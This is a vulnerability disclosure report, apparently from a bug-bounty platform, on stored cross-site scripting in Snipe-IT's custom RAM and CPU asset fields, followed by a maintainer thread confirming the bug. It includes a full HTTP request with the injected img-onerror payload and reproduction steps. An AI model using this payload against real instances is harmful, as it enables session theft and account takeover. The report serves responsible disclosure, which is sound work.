Cross-site Scripting (XSS) - Stored in snipe/snipe-it
Reported on
Nov 11th 2021
Description
Multiple Stored XSS at '_snipeit_ram_3' and '_snipeit_cpu_4' in the multipart message of POST request when creating a new Asset or editing an existed Asset.
Proof of Concept
POST /hardware HTTP/1.1
Host: develop.snipeitapp.com
Connection: close
Content-Length: 2560
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://develop.snipeitapp.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary46mG0KnErxSyjdPS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://develop.snipeitapp.com/hardware/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: snipeitv5demo_session=0Eh7YSRhHibblEqPBiMIwljUeqCKslZfeRVyUL7Y; assetsListingTable.bs.table.pageNumber=1; assetsListingTable.bs.table.searchText=abcde; laravel_token=eyJpdiI6IklFZkVHc0JNU04rMzhIWThVdUR1SHc9PSIsInZhbHVlIjoiZlQxOTZXS3NuUGFBZlpKaUNuMGJlS2NuSjdpSm1yNmR3cXdpd3B4VkR5WFo5WlRtVmJoTll2U0JHbDQ1dVRHSlE5NGhnMGRqV3Z1ZTFNVGszUXZIMy9iVHNZQUdJdlhXbmt6OE9BdjdLMVFQMXJZQXVROE1YdTZHZC85MzJZcnhrWG1ya1BKL0pUVXpSS2Jhd0VRMXRvQXpPUkIrVXcvREQvdWwyYWlwQk9VRW1IRzdYcWZTOW1xRVM5RkFmZ0xPQit3QUVYVEpWOXhIa0l2cytmWUZ2a29sdGNxdHFWTGpSYzdGTGNLamQ3aFNiNXRMRlF6VTJBMlpLMEFWV1FCcUxTaW5SakRYc0VYYXRSMEtGNk5NVzRBNkMvV0lSanJoS1lja0lnMFZpbHhqK2NPNW1QckFtczhUcDhMYmd4L1MiLCJtYWMiOiIxYjg1MmQxZWJkOGU2MjU5MzQxZWFhMDNhYmMxMWUzNzJiYjYxOTk4ZmQyNmU1YzZiMWFhNDNiY2EyZTFkNTgyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6Ik9jZkdjcmFWazlOd2s0N3ZXRlZsYkE9PSIsInZhbHVlIjoiMWY1MnBuNG9XUnVZQlg4aTZGYXUzVEJ3a1k2ajlLVXBoRkZKKzZacXE0K2xod1JEbkdQSmN1UzVMSnduQ2d2UGRiTm01dUlJK1BhOUxrMGNmVzRBS2hDY2JIK1JVR1ZTRGw5WFZFMDR3VExmaVg1WDY3MjRSbnl2UWRaNkF0WHIiLCJtYWMiOiI0OTM0NGY2MGFjYTU5ODEzYjYxZTNiYjdkNTBjM2RhZDdjNmMxZTAxYmY4MjdmNDFkNjAyYjc4NDU1MmFmNTc2IiwidGFnIjoiIn0%3D
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_token"
KqyxmJgNorRhODZo5Inzo4FAzqdOvLscrtYuzbQd
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="company_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="asset_tags[1]"
PGS-IT-sdf35777
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="serials[1]"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="model_id"
8
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_ram_3"
"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_cpu_4"
"><img src=x onerror=alert(1);>
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="_snipeit_mac_address_5"
00:00:5e:00:53:af
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="status_id"
1
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="checkout_to_type"
user
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_user"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_asset"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="assigned_location"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="name"
abcde
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_date"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="supplier_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="order_number"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="purchase_cost"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="warranty_months"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="notes"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="rtd_location_id"
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary46mG0KnErxSyjdPS--
Steps to Reproduce
- After login, in the dashboard, click on the Create New -> Asset on the top right corner to create a new asset
- Fill in the required information in all fields in the Create Asset page
- In the Model field, select a model which has the RAM and CPU fields that appear.
- In the RAM and CPU fields, input the payload
"><img src=x onerror=alert(1);> - Click Save button
- In the left menu bar, click List All in Assets section to go to All Assets page
- Search for the name of the asset that you created above, an XSS popup will display
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
PoC Video: PoC
Can you reproduce this on demo.snipeitapp.com, or only on develop? Develop is not intended for production use.
Hi @maintainer, On demo.snipeitapp.com, when creating a new Asset, after choosing a model, there are no RAM and CPU fields appear so that it cannot reproduce on the demo. As well as in List All assets page, there are no CPU and RAM columns.
So, the XSS vulnerability only exists on the development, which has the vulnerable fields (CPU and RAM).
I guess that maybe those fields are new features that you are experimenting in the develop demo. So, if you intend to implement them in the release production, you can keep an eye for a potential XSS vulnerability as I mentioned in this report.
Hi @maintainer, Can you mark this disclose as a valid one? At least it is still vulnerable on the dev branch. The next time when I check for the bugs, I will take care of the demo for the master branch.
You can create those features on the demo instance by going into Custom Fields and then associating them with a model, then creating an asset of that model type.
I don't really consider this bounty-worthy, since it's likely fixed on master already and would be resolved when master gets merged down into develop. (i.e. this looks like a duplicate to me of a bug that was fixed on master in the past few weeks.)
I have followed your instruction to create a new custom field and then I created a new asset with the XSS payload in that custom field, the XSS popup showed up.
(Note that at this time I reproduced it on demo.snipeitapp.com, which is your master branch, you can check my new PoC here: PoC)
I also know that you have been noticed another XSS report a few weeks ago. However, the XSS vulnerability in that report exists in other functions. Furthermore, it requires user interaction to trigger the XSS. In contrast, the XSS popup in my report will be triggered whenever a user views the asset list with no further action required.
Thanks for the clarification - I can confirm this is reproducable on master
Hi @snipe, @admin, Can you credit my name (Chau Minh Khanh) in the vulnerability information on Snyk? (https://security.snyk.io/vuln/SNYK-PHP-SNIPESNIPEIT-1923007). Thanks a lot!
@khanhchauminh - as mentioned in a separate report, this page will be included in the CVE, which includes the credit 👌 👍
A bug in our system caused the fix bounty to be set to $11.88 post validation. I have reverted it to the correct value of $10.